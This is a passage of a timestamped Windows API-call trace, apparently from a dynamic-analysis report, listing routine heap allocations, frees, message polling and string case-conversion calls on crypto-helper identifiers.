Flags=0x0, Size=0x8) returned 0x9c26c8 [0196.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0196.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0196.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0196.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0196.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0196.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0196.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0196.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0196.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0196.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x102c9) returned 0xa5f008 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0196.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0196.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0196.993] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0196.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0196.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0196.993] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0196.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0196.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.993] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0196.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2878 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0196.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0196.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.994] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0196.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0196.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0196.994] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.995] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0196.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0196.996] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0196.997] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0196.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0196.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0196.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0196.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0196.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0196.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0196.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0196.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.000] HeapFree (in: hHeap=0x8a0000, 